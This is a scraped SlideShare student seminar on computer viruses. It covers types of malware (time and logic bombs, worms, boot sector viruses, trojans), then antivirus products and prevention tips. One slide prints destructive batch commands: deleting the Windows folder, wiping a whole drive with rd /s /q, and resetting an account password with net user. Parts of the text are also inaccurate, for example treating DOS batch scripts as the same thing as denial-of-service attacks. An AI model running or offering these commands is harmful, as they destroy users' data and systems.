SlideShare a Scribd company logo
@ Debraj
@ Debraj Chatterjee
   Computer virus refers to a program which
    damages computer systems and/or destroys or
    erases data files
   It has a Capability to copy itself and infect a
    computer without the permission or
    knowledge of the owner.
   One of the first detected virus was the Creeper
    virus in the early 70’s
Boot
Time   Logical                   Dos     Trojan
                 Worm   Sector
Bomb    Bomb                     Virus   Horse
                        Virus
Time   A time bomb is a virus
         program that performs an
Bomb     activity on a particular
         date
       It is a piece of Programming
       Code designed to damage a
         computer system at some
         point in the future. Time
         Bombs can Be set to Go Off
         on a certain Date, or
         after the bomb copies
         itself a certain no.of
         times. When It
         explodes, it can disable
         other Software, destroy
         files of crash the whole
         System.
   A logic bomb is a sort of program or
                 you can say a part of some program
Logic Bomb       which let itself dormant till a certain
                 logic program is activated. A logic
                 bomb is very comparable to a land mine.
                 Most of a time an activation key for a
                 logic bomb, is a date. The logic bomb
                 keeps checking the system for date and
                 remains in position till the set time
                 is reached. As soon as time has been
                 reached it activates itself.

                Logic bomb lacks the power to replicate
                 itself so it is an easy task to write a
                 logic bomb. And it would also don’t
                 spread to unintended systems. It is a
                 sort of civilized program threat.

                The classic use of this virus is
                 ensuring payment for some software. If
                 you don’t pay for some software then it
                 is certain that embedded logic bomb
                 would be activated and deletes that
                 software from your system. And if more
                 malicious then it would result other
                 data deleting from your system.
Worm                       It is a code designed to damage a
                              wide network of Computers. A
                              common purpose of worms is to
                              install a backdoor into a
                              computer. These are programs
Top 10 Computer Worms in      that allow others to gain
Internet History:             access to your computer. Worms
                              Spread by digging into the e-
                              Mail address book and sending
                              themselves automatically to
Morris(1988)
                              everyone the victim knows. Once
Melissa(1999)                they get started, Worms not
ILove You(2000)              only Wreck individual computers
Nimdah(2001)                 but also attack website
Code Red(2001)
                              servers. In 2003, a Worm
                              threatened to take down the
Blaster(2003)
                              Whole
Slammer(2003)                internet. W32.Mydoom.AX@mm i
Sasser(2004)                s an example of a worm. It
Storm(2007)                 was designed to allow
Conficker(2009)             spammers to send spam e-
                             mail from infected computers
The boot sector is the first software loaded
                        onto your computer. This program resides on
Boot Sector Virus       a disk, and this disk can be either the hard
                        disk inside the computer, a floppy disk or a
                        CD.

                    A boot sector virus infects computers by
                        modifying the contents of the boot sector
                        program. It replaces the legitimate contents
                        with its own infected version. A boot sector
                        virus can only infect a machine if it is
                        used to boot-up your computer, e.g. if you
                        start your computer by using a floppy disk
                        with an infected boot sector, your computer
                        is likely to be infected. A boot sector
                        cannot infect a computer if it is introduced
                        after the machine is running the operating
                        system.

                    An example of a boot sector virus is Parity
                        Boot. This Virus displays the message PARITY
                        CHECK and freezes the operating
                        system, rendering the computer useless. This
                        virus message is taken from an actual error
                        message which is displayed to users when a
                        computer's memory is faulty. As a result, a
                        user whose computer is infected with the
                        Parity Boot virus is led to believe that the
                        machine has a memory fault rather than an
                        disruptive virus infection.
The Viruses scripting done
Dos Virus     using DOS in known as Dos
              Virus.
            They are mainly used to destroy
              the Victim’s System and not
              really related to stealing of
              The Stuff Through a
              Network.
            A denial of service(DOS) attack
              can also destroy
              programming and files in
              affected computer systems.
    ******************************start of code*****
@echo off
cd
cd c:window
@deltree/y c:windows
exit
**************end of code********      ******************************start of code*****
                                        Changing Account Password:
                                         net user [annount_name] *
                                         ex:- net user john *
                                        **************end of code********
     ******************************start of code*****
     Deleting all files of a drive:
     @echo off
     rd /s /q [drivename:]
**************end of code********
Trojan
            It is a Malicious Software disguised as
             a useful program or computer File.


Horse    How Trojans work
            Trojans usually consist of two parts, a
             Client and a Server. The server is run
             on the victim's machine and listens for
             connections from a Client used by the
             attacker.

            When the server is run on a machine it
             will listen on a specific port or
             multiple ports for connections from a
             Client. In order for an attacker to
             connect to the server they must have
             the IP Address of the computer where
             the server is being run. Some trojans
             have the IP Address of the computer
             they are running on sent to the
             attacker via email or another form of
             communication.
             Once a connection is made to the
             server, the client can then send
             commands to the server; the server will
             then execute these commands on the
             victim's machine.
Seminar project(computer virus)
   The one and the safest method is the use of an Anti-Virus
    Program.


   How does an Antivirus work?
    Antivirus is the prime line of defense which operates to
    eliminate and destroy malwares. Simply put, an Antivirus
    scans our system to detect and eliminate malwares. Not only
    system checking but any new file is checked due to
    suspicion before being downloaded into our system.

They Search For Virus Files into the whole System and either
   delets them or ignors them according to the User’s Choice.
   Norton Anti-Virus
   Avast Security Centre
   Kaspersky Anti-virus
   Avira Anti-virus
   Quick-Heal Antivirus
   Bit-Defender Antivirus
   Guardian Anti-Virus
Virus Attacks are most Common in every
   Computer, specially when connected to the
   Internet. What We need to do is to prevent from
   harming the System.

ACTIONS TO PREVENT VIRUS INFECTION
 Installation and updation of Anti-Virus Programs.

 Installation of Security Updates for the Computer.

 Not Opening of unknown e-Mails which may Contain
  mostly Virus Files.
 Backing Up of important files in another Drive.

 Changing the Boot Sequence and setting the Hard Disk
  as the 1st priority booting device.
   http://en.wikipedia.org/wiki/Computer_virus
    #History
   www.microsoft.com
   www.cdebraj98.blogspot.com
   www.google.com
Seminar project(computer virus)

More Related Content

PPTX
Computer Virus
PPTX
MALWARE AND ITS TYPES
PPTX
Computer virus
PPTX
Virus and antivirus
PPTX
Computer Malware and its types
PPTX
Presentation on Computer Viruses
PPT
Ppt on different types of computer viruses
PPTX
Virus and malware presentation
Computer Virus
MALWARE AND ITS TYPES
Computer virus
Virus and antivirus
Computer Malware and its types
Presentation on Computer Viruses
Ppt on different types of computer viruses
Virus and malware presentation

What's hot (20)

PPTX
What is a computer virus
PPT
Presentation on computer viruses
PPTX
Computer virus
PPTX
virus and antivirus
PPT
Computer virus
PDF
Malware and security
ODP
Computer virus
ODP
Virus and antivirus final ppt
PDF
computer virus Report
PPT
Computer viruses and antiviruses PPT
PPTX
List of Malwares
PPTX
Welcome to my presentation
PPTX
Computer virus and antivirus
PPTX
Computer Virus powerpoint presentation
PPTX
Firewall , Viruses and Antiviruses
PPT
Introduction to Malware
PPT
Virus, Worms And Antivirus
PPT
Computer virus
PPT
Malware
PPTX
Antivirus PPt
What is a computer virus
Presentation on computer viruses
Computer virus
virus and antivirus
Computer virus
Malware and security
Computer virus
Virus and antivirus final ppt
computer virus Report
Computer viruses and antiviruses PPT
List of Malwares
Welcome to my presentation
Computer virus and antivirus
Computer Virus powerpoint presentation
Firewall , Viruses and Antiviruses
Introduction to Malware
Virus, Worms And Antivirus
Computer virus
Malware
Antivirus PPt
Ad

Viewers also liked (20)

PPTX
Computer virus (Microsoft Powerpoint)
PPTX
ANTIVIRUS AND VIRUS Powerpoint presentation
PPT
Virus project
PPTX
presentation on computer virus
PPTX
virus powerpoint
PPTX
Virus vs anti virus
PPTX
Antivirus
PPSX
Seminar and Project presentation tips
 
PPTX
Seminar project
PPT
Signature based virus detection and protection system
DOC
TRIP WIRE
PPTX
Computer virus
PDF
Introducing Data Loss Prevention 14
PPT
Digital light processing
PPTX
Bit torrent Technology ppt
PPTX
Antivirus software
PPSX
Gaming console final presentation
PPT
Computer Virus
PPT
Computer Malware
PPT
Social networking
Computer virus (Microsoft Powerpoint)
ANTIVIRUS AND VIRUS Powerpoint presentation
Virus project
presentation on computer virus
virus powerpoint
Virus vs anti virus
Antivirus
Seminar and Project presentation tips
 
Seminar project
Signature based virus detection and protection system
TRIP WIRE
Computer virus
Introducing Data Loss Prevention 14
Digital light processing
Bit torrent Technology ppt
Antivirus software
Gaming console final presentation
Computer Virus
Computer Malware
Social networking
Ad

Similar to Seminar project(computer virus) (20)

PPTX
Computer Virus
PPT
Computer virus_the_things_u_must_know_
PDF
Form4 cd2
PPTX
Cruda, mayday pp tx 2
PPTX
Program and System Threats
PDF
4 threatsandvulnerabilities
PPTX
Basics of Network Security
PPT
PPTX
Information security and privacy
PPTX
Information security and privacy
DOCX
Computer viruses by joy chakraborty
PPT
6unit1 virus and their types
PPTX
Final malacious softwares
PDF
Threats of Computer System and its Prevention
PPT
Lecture 12 malicious software
DOC
Chapter 2- Computer Threat.docChapter 2- Computer Threat.doc
PPTX
Virus worm trojan
PPT
Malicious
PPTX
Computer Viruses
PPT
Computer Virus
Computer virus_the_things_u_must_know_
Form4 cd2
Cruda, mayday pp tx 2
Program and System Threats
4 threatsandvulnerabilities
Basics of Network Security
Information security and privacy
Information security and privacy
Computer viruses by joy chakraborty
6unit1 virus and their types
Final malacious softwares
Threats of Computer System and its Prevention
Lecture 12 malicious software
Chapter 2- Computer Threat.docChapter 2- Computer Threat.doc
Virus worm trojan
Malicious
Computer Viruses

Recently uploaded (20)

PDF
Empathic Computing: Creating Shared Understanding
PDF
TokAI - TikTok AI Agent : The First AI Application That Analyzes 10,000+ Vira...
PDF
Review of recent advances in non-invasive hemoglobin estimation
PDF
7 ChatGPT Prompts to Help You Define Your Ideal Customer Profile.pdf
PDF
A comparative analysis of optical character recognition models for extracting...
PDF
Chapter 3 Spatial Domain Image Processing.pdf
PPTX
Spectroscopy.pptx food analysis technology
PDF
Encapsulation_ Review paper, used for researhc scholars
PDF
Per capita expenditure prediction using model stacking based on satellite ima...
PDF
Building Integrated photovoltaic BIPV_UPV.pdf
PDF
Blue Purple Modern Animated Computer Science Presentation.pdf.pdf
PDF
Build a system with the filesystem maintained by OSTree @ COSCUP 2025
PDF
Agricultural_Statistics_at_a_Glance_2022_0.pdf
PDF
The Rise and Fall of 3GPP – Time for a Sabbatical?
PDF
Unlocking AI with Model Context Protocol (MCP)
PDF
Diabetes mellitus diagnosis method based random forest with bat algorithm
PPTX
20250228 LYD VKU AI Blended-Learning.pptx
PDF
Electronic commerce courselecture one. Pdf
PDF
Architecting across the Boundaries of two Complex Domains - Healthcare & Tech...
PDF
Assigned Numbers - 2025 - Bluetooth® Document
Empathic Computing: Creating Shared Understanding
TokAI - TikTok AI Agent : The First AI Application That Analyzes 10,000+ Vira...
Review of recent advances in non-invasive hemoglobin estimation
7 ChatGPT Prompts to Help You Define Your Ideal Customer Profile.pdf
A comparative analysis of optical character recognition models for extracting...
Chapter 3 Spatial Domain Image Processing.pdf
Spectroscopy.pptx food analysis technology
Encapsulation_ Review paper, used for researhc scholars
Per capita expenditure prediction using model stacking based on satellite ima...
Building Integrated photovoltaic BIPV_UPV.pdf
Blue Purple Modern Animated Computer Science Presentation.pdf.pdf
Build a system with the filesystem maintained by OSTree @ COSCUP 2025
Agricultural_Statistics_at_a_Glance_2022_0.pdf
The Rise and Fall of 3GPP – Time for a Sabbatical?
Unlocking AI with Model Context Protocol (MCP)
Diabetes mellitus diagnosis method based random forest with bat algorithm
20250228 LYD VKU AI Blended-Learning.pptx
Electronic commerce courselecture one. Pdf
Architecting across the Boundaries of two Complex Domains - Healthcare & Tech...
Assigned Numbers - 2025 - Bluetooth® Document

Seminar project(computer virus)

  • 1. @ Debraj @ Debraj Chatterjee
  • 2. Computer virus refers to a program which damages computer systems and/or destroys or erases data files  It has a Capability to copy itself and infect a computer without the permission or knowledge of the owner.  One of the first detected virus was the Creeper virus in the early 70’s
  • 3. Boot Time Logical Dos Trojan Worm Sector Bomb Bomb Virus Horse Virus
  • 4. Time A time bomb is a virus program that performs an Bomb activity on a particular date It is a piece of Programming Code designed to damage a computer system at some point in the future. Time Bombs can Be set to Go Off on a certain Date, or after the bomb copies itself a certain no.of times. When It explodes, it can disable other Software, destroy files of crash the whole System.
  • 5. A logic bomb is a sort of program or you can say a part of some program Logic Bomb which let itself dormant till a certain logic program is activated. A logic bomb is very comparable to a land mine. Most of a time an activation key for a logic bomb, is a date. The logic bomb keeps checking the system for date and remains in position till the set time is reached. As soon as time has been reached it activates itself.  Logic bomb lacks the power to replicate itself so it is an easy task to write a logic bomb. And it would also don’t spread to unintended systems. It is a sort of civilized program threat.  The classic use of this virus is ensuring payment for some software. If you don’t pay for some software then it is certain that embedded logic bomb would be activated and deletes that software from your system. And if more malicious then it would result other data deleting from your system.
  • 6. Worm It is a code designed to damage a wide network of Computers. A common purpose of worms is to install a backdoor into a computer. These are programs Top 10 Computer Worms in that allow others to gain Internet History: access to your computer. Worms Spread by digging into the e- Mail address book and sending themselves automatically to Morris(1988) everyone the victim knows. Once Melissa(1999) they get started, Worms not ILove You(2000) only Wreck individual computers Nimdah(2001) but also attack website Code Red(2001) servers. In 2003, a Worm threatened to take down the Blaster(2003) Whole Slammer(2003) internet. W32.Mydoom.AX@mm i Sasser(2004) s an example of a worm. It Storm(2007) was designed to allow Conficker(2009) spammers to send spam e- mail from infected computers
  • 7. The boot sector is the first software loaded onto your computer. This program resides on Boot Sector Virus a disk, and this disk can be either the hard disk inside the computer, a floppy disk or a CD. A boot sector virus infects computers by modifying the contents of the boot sector program. It replaces the legitimate contents with its own infected version. A boot sector virus can only infect a machine if it is used to boot-up your computer, e.g. if you start your computer by using a floppy disk with an infected boot sector, your computer is likely to be infected. A boot sector cannot infect a computer if it is introduced after the machine is running the operating system. An example of a boot sector virus is Parity Boot. This Virus displays the message PARITY CHECK and freezes the operating system, rendering the computer useless. This virus message is taken from an actual error message which is displayed to users when a computer's memory is faulty. As a result, a user whose computer is infected with the Parity Boot virus is led to believe that the machine has a memory fault rather than an disruptive virus infection.
  • 8. The Viruses scripting done Dos Virus using DOS in known as Dos Virus. They are mainly used to destroy the Victim’s System and not really related to stealing of The Stuff Through a Network. A denial of service(DOS) attack can also destroy programming and files in affected computer systems.
  • 9. ******************************start of code***** @echo off cd cd c:window @deltree/y c:windows exit **************end of code******** ******************************start of code***** Changing Account Password: net user [annount_name] * ex:- net user john * **************end of code******** ******************************start of code***** Deleting all files of a drive: @echo off rd /s /q [drivename:] **************end of code********
  • 10. Trojan  It is a Malicious Software disguised as a useful program or computer File. Horse How Trojans work  Trojans usually consist of two parts, a Client and a Server. The server is run on the victim's machine and listens for connections from a Client used by the attacker.  When the server is run on a machine it will listen on a specific port or multiple ports for connections from a Client. In order for an attacker to connect to the server they must have the IP Address of the computer where the server is being run. Some trojans have the IP Address of the computer they are running on sent to the attacker via email or another form of communication. Once a connection is made to the server, the client can then send commands to the server; the server will then execute these commands on the victim's machine.
  • 12. The one and the safest method is the use of an Anti-Virus Program.  How does an Antivirus work? Antivirus is the prime line of defense which operates to eliminate and destroy malwares. Simply put, an Antivirus scans our system to detect and eliminate malwares. Not only system checking but any new file is checked due to suspicion before being downloaded into our system. They Search For Virus Files into the whole System and either delets them or ignors them according to the User’s Choice.
  • 13. Norton Anti-Virus  Avast Security Centre  Kaspersky Anti-virus  Avira Anti-virus  Quick-Heal Antivirus  Bit-Defender Antivirus  Guardian Anti-Virus
  • 14. Virus Attacks are most Common in every Computer, specially when connected to the Internet. What We need to do is to prevent from harming the System. ACTIONS TO PREVENT VIRUS INFECTION  Installation and updation of Anti-Virus Programs.  Installation of Security Updates for the Computer.  Not Opening of unknown e-Mails which may Contain mostly Virus Files.  Backing Up of important files in another Drive.  Changing the Boot Sequence and setting the Hard Disk as the 1st priority booting device.
  • 15. http://en.wikipedia.org/wiki/Computer_virus #History  www.microsoft.com  www.cdebraj98.blogspot.com  www.google.com